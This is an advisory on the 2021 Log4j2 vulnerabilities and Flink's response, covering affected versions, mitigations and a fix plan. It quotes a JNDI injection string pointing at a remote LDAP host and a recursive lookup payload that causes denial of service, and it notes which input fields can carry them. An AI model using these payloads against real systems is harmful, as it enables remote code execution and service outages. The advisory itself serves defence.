The authors of this article, Yu Hangxiang & Li Yu, detail the impact of the Log4j2 zero-day vulnerability and the Flink community's response. The main contents include:

  1. Vulnerability description
  2. Possible impact on Flink users
  3. Affected Flink versions and interim solutions
  4. Flink community fix plan

Overview

Apache Log4j is a Java-based logging tool. Apache Log4j2 is a rewrite of Log4j that adds many features. Recently, Alibaba Cloud Security reported a zero-day vulnerability in Apache Log4j2 [1] that lets an attacker craft a malicious request to trigger remote code execution; it is tracked as CVE-2021-44228 [2]. The Log4j team released version 2.15.0 as soon as the problem was confirmed, along with an interim mitigation.

On December 14, a team from Twitter discovered and reported a new vulnerability: CVE-2021-45046 [17]. It shows that the fix for CVE-2021-44228 in 2.15.0 and the proposed interim mitigation are incomplete and can still be exploited for denial-of-service (DoS) attacks under certain configurations. The Log4j team then released version 2.16.0, recommended that affected software be upgraded to it, and published a new interim mitigation.

These vulnerabilities affect Log4j2 versions 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0. Apache Flink 1.10 and earlier use Log4j 1.x and can be considered unaffected. Flink 1.11 and later use Log4j 2.x and are in the affected range.

On December 16, a new issue concerning Apache Log4j was raised [18]; after verification, CVE-2021-45105 [19] was published on December 18. It shows that version 2.16.0 and the interim mitigation for CVE-2021-45046 are still vulnerable to DoS attacks under certain configurations. The Log4j team promptly released version 2.17.0 together with a new interim mitigation.

The vulnerability affects versions from 2.0-beta9 to 2.16.0.
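
The version ranges quoted above can be turned into a quick check. The following is a minimal sketch, not an official tool: the class and method names are hypothetical, the ranges are copied from this article, and pre-release suffixes such as "-beta9" are simply ignored, so anything labeled 2.0 is treated as inside the range.

```java
final class Log4jVersionCheck {
    /** Parses "2.14.1" into {2, 14, 1}; a suffix such as "-beta9" is ignored (simplification). */
    static int[] parse(String version) {
        String[] parts = version.split("-", 2)[0].split("\\.");
        int[] out = new int[3];
        for (int i = 0; i < out.length && i < parts.length; i++) {
            out[i] = Integer.parseInt(parts[i]);
        }
        return out;
    }

    /** Lexicographic comparison of two {major, minor, patch} triples. */
    static int compare(int[] a, int[] b) {
        for (int i = 0; i < 3; i++) {
            if (a[i] != b[i]) {
                return Integer.compare(a[i], b[i]);
            }
        }
        return 0;
    }

    static boolean inRange(String version, String low, String high) {
        int[] v = parse(version);
        return compare(v, parse(low)) >= 0 && compare(v, parse(high)) <= 0;
    }

    /** Ranges stated in this article for CVE-2021-44228 and CVE-2021-45046. */
    static boolean affectedByJndiCves(String version) {
        return inRange(version, "2.0", "2.12.1") || inRange(version, "2.13.0", "2.15.0");
    }

    /** Range stated in this article for CVE-2021-45105. */
    static boolean affectedByLookupRecursion(String version) {
        return inRange(version, "2.0", "2.16.0");
    }

    public static void main(String[] args) {
        for (String v : new String[] {"1.2.17", "2.12.1", "2.16.0", "2.17.0"}) {
            System.out.println(v + " jndi=" + affectedByJndiCves(v)
                    + " recursion=" + affectedByLookupRecursion(v));
        }
    }
}
```

A check like this only tells you which bundled Log4j version needs attention; it does not inspect the logging configuration, which also matters for the two later CVEs.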

Next, we briefly describe the details and impact of the vulnerabilities and then their possible impact on Flink users. Finally, we detail the interim solutions available to Flink users and the Flink community's fix plan.

I. Vulnerability description

CVE-2021-44228

The vulnerability can be traced back to a feature introduced early in Log4j2's history. In 2013, version 2.0-beta9 [3] added the “JNDILookup plugin” [4].

Java introduced JNDI (Java Naming and Directory Interface) in the late 1990s as a directory service API that lets Java programs look up data, in the form of Java objects, through a directory. JNDI provides SPI support for several directory services, such as CORBA COS (Common Object Services), the Java RMI (Remote Method Invocation) Registry, and LDAP (Lightweight Directory Access Protocol). These are the services that CVE-2021-44228/45046 can exploit. A Java program can combine JNDI and LDAP to look up Java objects containing data it needs. For example, the standard Java documentation includes an example that communicates with an LDAP server to retrieve object attributes: it uses the URL “ldap://localhost:389/o=JNDITutorial” to find the JNDITutorial object on the LDAP server running on port 389 of the same machine (localhost) and then reads attributes from it. As the official JNDI tutorial notes, “you need to edit the LDAP URL if your LDAP server is on a different machine or using a different port”, so the LDAP server can run on a different machine or anywhere on the Internet. This flexibility means that if attackers can control the LDAP URL, they can make a Java program load objects from a server they control.

In vulnerable versions of Log4j, an attacker can control the LDAP URL that Log4j accesses by passing in a string of the form “${jndi:ldap://example.com/a}”. In this case, Log4j connects to the LDAP server at example.com and retrieves the object.

Log4j gives special treatment to strings of the form “${prefix:name}”, where prefix is one of the Lookups [5] provided by Log4j and name is the key evaluated by that Lookup. For example, ${java:version} resolves to the currently running version of Java. The JndiLookup added in LOG4J2-313 provides the ability to retrieve variables through JNDI. By default, the key is prefixed with “java:comp/env/”. However, if the key itself contains a ‘:’, no prefix is added. So when a string such as “${jndi:ldap://example.com/a}” is passed in, Log4j does not add the default prefix and, because of the Message Lookup mechanism, ends up querying the LDAP server for the target object.
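
To make the prefix rule concrete, here is a minimal sketch that splits a single, non-nested lookup expression into its prefix and key and applies the "java:comp/env/" rule described above. It is an illustration only: the class and method names are hypothetical, the regular expression is far simpler than Log4j's own substitution logic, and it should not be used as a detector, since nested expressions can disguise the prefix.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

final class LookupSyntaxSketch {
    // Matches one non-nested ${prefix:key} expression (illustrative, not Log4j's parser).
    private static final Pattern LOOKUP = Pattern.compile("\\$\\{([^:{}]+):([^{}]*)\\}");

    /** Returns {prefix, key} for the first ${prefix:key} found, or null if there is none. */
    static String[] firstLookup(String text) {
        Matcher m = LOOKUP.matcher(text);
        return m.find() ? new String[] {m.group(1), m.group(2)} : null;
    }

    /** Applies the rule from the text: "java:comp/env/" is prepended only if the key has no ':'. */
    static String effectiveJndiName(String key) {
        return key.contains(":") ? key : "java:comp/env/" + key;
    }

    public static void main(String[] args) {
        String[] parsed = firstLookup("User-Agent: ${jndi:ldap://example.com/a}");
        System.out.println("prefix = " + parsed[0]);
        System.out.println("key    = " + parsed[1]);
        System.out.println("name   = " + effectiveJndiName(parsed[1]));
    }
}
```

Because the key "ldap://example.com/a" contains a colon, it is passed through unchanged, which is why the lookup reaches a remote LDAP server instead of the local "java:comp/env/" namespace.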

As a result, an attacker only needs to find an input that may be logged and add a string like “${jndi:ldap://example.com/a}” to it. For example, an attacker may insert the attack string into an HTTP header such as User-Agent or a form parameter such as username.

Logging such input is common in Java-based, Internet-facing applications. Worse, the data can be passed from one system to another, so that Java applications that are not Internet-facing can also fall victim.

For example, a User-Agent string carrying the exploit could be passed to a backend system written in Java that builds indexes or runs analytics on the data, and that system might also log it through Log4j, with significant impact. **Therefore, all Java-based software that uses Log4j2 should be patched immediately; otherwise the potential threat is high. Even if the Internet-facing software is not written in Java, malicious strings can be passed on to other systems written in Java and cause serious problems.** Another example is a Java-based billing system that logs a customer’s name when the customer cannot be found. An attacker can create an order whose customer name contains the exploit string; that string is likely to travel through the web server and the database system and finally into the billing system, and every system along the chain may be affected.

In addition, Java is used in many scenarios other than Internet-facing systems. For example, a package-handling system that scans QR codes or a contactless door lock that reads electronic keys could be vulnerable if it is written in Java and uses Log4j. A carefully crafted QR code may encode a postal address containing the exploit string, and a carefully programmed electronic key may carry a payload that exploits the vulnerability and tracks our comings and goings.

Other systems that run scheduled tasks may not process the malicious data right away, so the vulnerability may lie dormant until a scheduled task that summarizes or archives data logs the malicious string. It can take hours or even days for the exploit to trigger and cause serious damage.

CVE-2021-45046

This vulnerability was discovered by a team at Twitter. The fix for CVE-2021-44228 in 2.15.0 and the Log4j team's earlier recommendations do not completely prevent exploitation. The reason is that when the log configuration uses certain non-default Pattern Layouts (with a Context Lookup or a Thread Context Map pattern), attackers can use the pattern to inject malicious data.

If the log configuration uses such a Pattern Layout, the mitigation based on setting “log4j2.formatMsgNoLookups=true” does not prevent malicious data from using JndiLookup to trigger CVE-2021-44228. Even though 2.15.0 restricts JNDI LDAP lookups to localhost, a risk of DoS attacks remains.

CVE-2021-45105

This vulnerability shows that Log4j 2.16.0, and the interim mitigations for CVE-2021-45046, still leave a risk of DoS attacks. When the log configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), an attacker can add malicious data to the Thread Context Map (such as ${${::-${::-$${::-j}}}}) to trigger infinitely recursive Lookup evaluation, which terminates the process with a StackOverflowError.

If such a Pattern Layout exists in the log configuration, the mitigations based on “log4j2.formatMsgNoLookups=true” and on removing JndiLookup.class do not prevent malicious data from triggering CVE-2021-45105, because the root cause lies in the string substitution process.
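
The general failure mode, a lookup whose result is itself expanded again without any bound, can be shown with a deliberately simplified toy. This is not Log4j's string substitution code, and the real payload relies on Log4j's nested lookup syntax rather than the plain self-reference used here; the class name, the map, and the depth limit are all assumptions of this sketch. The depth limit is only this sketch's own guard and says nothing about how 2.17.0 fixes the issue.

```java
import java.util.HashMap;
import java.util.Map;

final class RecursiveLookupSketch {
    private static final String OPEN = "${ctx:";
    private final Map<String, String> contextMap = new HashMap<>();

    void put(String key, String value) {
        contextMap.put(key, value);
    }

    /** Expands ${ctx:key} references and re-expands whatever each lookup returns. */
    String resolve(String text, int depth, int maxDepth) {
        if (depth > maxDepth) {
            // Without a guard like this, self-referential data recurses until StackOverflowError.
            throw new IllegalStateException("lookup recursion limit exceeded");
        }
        int start = text.indexOf(OPEN);
        if (start < 0) {
            return text;
        }
        int end = text.indexOf('}', start);
        if (end < 0) {
            return text;
        }
        String key = text.substring(start + OPEN.length(), end);
        String expanded = resolve(contextMap.getOrDefault(key, ""), depth + 1, maxDepth);
        return text.substring(0, start) + expanded + resolve(text.substring(end + 1), depth, maxDepth);
    }

    public static void main(String[] args) {
        RecursiveLookupSketch sketch = new RecursiveLookupSketch();
        sketch.put("loginId", "${ctx:loginId}"); // attacker-controlled value that refers to itself
        try {
            sketch.resolve("user=${ctx:loginId}", 0, 16);
        } catch (IllegalStateException e) {
            System.out.println("stopped: " + e.getMessage());
        }
    }
}
```

The point of the toy is that the trigger is data placed in the context map, not the JNDI plugin, which is consistent with the statement above that removing JndiLookup.class does not help here.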

II. Possible impact on Flink users

Flink 1.11 and later are affected by this vulnerability. As mentioned in the previous section, although Flink is not directly Internet-facing in most usage scenarios, attack strings may be passed into Flink from other systems (even if those systems have taken precautions) and processed by UDFs in Flink. If a UDF logs the record while processing it (such logging is common in real applications), the vulnerability is triggered and can cause serious damage.

Take log analysis, a common scenario, as an example: UDFs often log information about the records they process. When an attack string (such as ${jndi:ldap://example.com/a}) enters Flink from Kafka and is processed by such UDFs, the nodes in the job execution environment are directly affected. On the one hand, this kind of message passing is not stopped by message encryption (the UDF decrypts encrypted messages before processing them); on the other hand, it does not require permission to submit Flink jobs, because the string can be injected upstream. Therefore, Flink systems face a high threat, especially execution environments that have Internet access and lack secure container isolation.

III. Affected Flink versions and interim solutions

The Log4j versions used by Flink are as follows:

As you can see, Flink 1.11 and later use Log4j 2.x and are therefore affected, while 1.10 and earlier can be considered unaffected. The community has responded actively to fix the problem; the detailed fix plan is described in the next section.

Until the community releases a fix, you need to follow the latest recommendations from the Log4j team.

Once the community has released a version based on Log4j 2.17.0, users can upgrade to it and then stop and restart their jobs to avoid these vulnerabilities.

If the Flink version used by the job bundles Log4j 2.16.0 (i.e. 1.14.2, 1.13.5, 1.12.7, 1.11.6), there are two options:

  1. In the PatternLayout of the log configuration, replace Context Lookups such as ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (e.g. %X, %mdc, or %MDC).
  2. Remove Context Lookups such as ${ctx:loginId} or $${ctx:loginId} from the logging configuration entirely (the key point is that such lookups allow injected malicious data to be resolved by Log4j).
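
The first option can be illustrated with a small helper that rewrites a PatternLayout string. This is a sketch under assumptions: the class and method names are hypothetical, the sample pattern is made up, and it assumes the keyed form %X{key} is the intended Thread Context Map replacement. A real configuration should be edited and reviewed by hand.

```java
final class PatternLayoutRewrite {
    /** Replaces ${ctx:key} and $${ctx:key} with the Thread Context Map pattern %X{key}. */
    static String replaceContextLookups(String pattern) {
        // \${1,2} matches one or two literal dollar signs; group 1 captures the key.
        return pattern.replaceAll("\\${1,2}\\{ctx:([^}]+)\\}", "%X{$1}");
    }

    public static void main(String[] args) {
        String before = "%d %p $${ctx:loginId} %m%n"; // hypothetical pattern for illustration
        System.out.println(before);
        System.out.println(replaceContextLookups(before));
    }
}
```

After the rewrite, the value is inserted by the pattern converter rather than through a Context Lookup, which is the substitution that option 1 asks for.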

If the job is currently using a Flink version that bundles Log4j 2.15.0 or earlier (that is, 1.14.1, 1.13.4, 1.12.6, 1.11.5 or earlier), then in addition to the above you need to run:

 zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

This removes JndiLookup.class from the log4j-core JAR that Flink depends on, which disables JNDI in the same way as 2.16.0.
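
After running the command, it may be worth confirming that the class is really gone from the JAR. The following is a minimal sketch using only the JDK's zip support; the class name is hypothetical and the JAR path is whatever log4j-core file your Flink distribution ships, passed as an argument.

```java
import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.zip.ZipFile;

final class JndiLookupCheck {
    static final String ENTRY = "org/apache/logging/log4j/core/lookup/JndiLookup.class";

    /** Returns true if the given JAR still contains JndiLookup.class. */
    static boolean containsJndiLookup(Path jar) throws IOException {
        try (ZipFile zip = new ZipFile(jar.toFile())) {
            return zip.getEntry(ENTRY) != null;
        }
    }

    public static void main(String[] args) throws IOException {
        if (args.length != 1) {
            System.err.println("usage: java JndiLookupCheck <path-to-log4j-core.jar>");
            return;
        }
        Path jar = Paths.get(args[0]);
        System.out.println(jar + (containsJndiLookup(jar) ? " still contains " : " does not contain ") + ENTRY);
    }
}
```

The check has to be repeated for every copy of the JAR on every node, since a single unpatched copy on the classpath is enough to leave the job exposed.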

Note the following three points:

  1. The job must be stopped while the fix is applied and restarted once it is complete.
  2. Other interim solutions for the Apache Log4j zero-day problem have been proposed [6][7], but only the method above completely avoids the impact of this vulnerability.
  3. You are advised to upgrade jobs in batches to the fixed version as soon as possible after the community releases it.

IV. Flink community fix plan

Log4j has released versions 2.15.0, 2.16.0, and 2.17.0. The fixes in each are as follows:

The Flink community discussed a fix plan [14] immediately after learning of the vulnerability. The community first upgraded Log4j on the master branch to 2.15.0 and cherry-picked the change to 1.14.1, 1.13.4, 1.12.6, and 1.11.5 [12]. These versions have now been published and can be used directly, for example: search.maven.org/artifact/or…

However, since Log4j 2.16.0 addresses the problem more thoroughly, the community further upgraded Log4j on the master branch to 2.16.0 and cherry-picked the change to 1.14.2, 1.13.5, 1.12.7, and 1.11.6 [13]. Voting on these new versions has been completed, and they are expected to be released soon [14][15][16].

A release based on Log4j 2.17.0 is currently being discussed [20][21]. Once the Flink community publishes versions that include Log4j 2.17.0, users only need to upgrade the Flink version used by their jobs to avoid the problem completely.

References

[1] Apache Log4j Vulnerability Details and Mitigation

www.cyberkendra.com/2021/12/apa…

[2] CVE-2021-44228

nvd.nist.gov/vuln/detail…

[3] Apache Log4j 2.0-beta9 released

blogs.apache.org/logging/ent…

[4] LOG4J2-313

issues.apache.org/jira/browse…

[5] Log4j Lookups

logging.apache.org/log4j/2.x/m…

[6] Advise on Apache Log4j Zero Day (CVE-2021-44228)

flink.apache.org/2021/12/10/…

[7] CVE-2021-44228 Solution

stackoverflow.com/questions/7…

[8] LOG4J2-3198

issues.apache.org/jira/browse…

[9] LOG4J2-3201

issues.apache.org/jira/browse…

[10] LOG4J2-3208

issues.apache.org/jira/browse…

[11] LOG4J2-3211

issues.apache.org/jira/browse…

[12] Update log4j2 version to 2.15.0

issues.apache.org/jira/browse…

[13] Update Log4j to 2.16.0

issues.apache.org/jira/browse…

[14] [DISCUSS] Immediate dedicated Flink releases for log4j vulnerability

lists.apache.org/thread/j15t…

[15] [VOTE] Release 1.11.5/1.12.6/1.13.4/1.14.1, release candidate #1

lists.apache.org/thread/64tn…

[16] [VOTE] Release 1.11.6/1.12.7/1.13.5/1.14.2, release candidate #1

lists.apache.org/thread/3yn7…

[17] CVE-2021-45046

nvd.nist.gov/vuln/detail…

[18] LOG4J2-3230

issues.apache.org/jira/browse…

[19] CVE-2021-45105

nvd.nist.gov/vuln/detail…

[20] CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation

lists.apache.org/thread/6gxl…

[21] FLINK-25375

issues.apache.org/jira/browse…